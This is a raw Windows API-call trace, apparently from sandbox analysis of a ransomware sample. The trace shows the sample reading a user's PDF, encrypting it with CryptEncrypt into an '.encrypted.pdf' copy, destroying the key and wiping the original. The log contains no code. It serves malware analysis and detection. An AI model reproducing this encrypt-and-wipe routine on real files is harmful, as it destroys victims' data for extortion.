lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0035.161] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0035.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0035.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\s_uc9.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.162] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.162] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0035.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.163] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.163] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.163] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c95d0 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0035.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.encrypted.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\s_uc9.encrypted.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0035.165] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.166] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.166] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x373c, lpOverlapped=0x0) returned 1 [0035.167] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.167] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x373c) returned 0x955018 [0035.168] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.168] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.168] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.168] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.168] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.168] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.169] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.170] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.170] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.171] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x373c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x3740) returned 1 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0035.171] CharLowerBuffW (in: lpsz="byte[14145]", cchLength=0xb | out: lpsz="byte[14145]") returned 0xb [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.172] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95f5f0*, pdwDataLen=0x6ae220*=0x373c, dwBufLen=0x3740 | out: pbData=0x95f5f0*, pdwDataLen=0x6ae220*=0x3740) returned 1 [0035.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.173] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.175] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.175] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0035.176] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.176] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.176] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.176] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0035.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.176] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.178] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.179] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d177b70, ftCreationTime.dwHighDateTime=0x1d5b5f8, ftLastAccessTime.dwLowDateTime=0x3287bd80, ftLastAccessTime.dwHighDateTime=0x1d5c359, ftLastWriteTime.dwLowDateTime=0x3287bd80, ftLastWriteTime.dwHighDateTime=0x1d5c359, nFileSizeHigh=0x0, nFileSizeLow=0x373c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s_Uc9.pdf", cAlternateFileName="")) returned 0x7c2100 [0035.179] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0035.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.179] CharLowerBuffW (in: lpsz="byte[14140]", cchLength=0xb | out: lpsz="byte[14140]") returned 0xb [0035.179] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.179] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.179] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.180] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 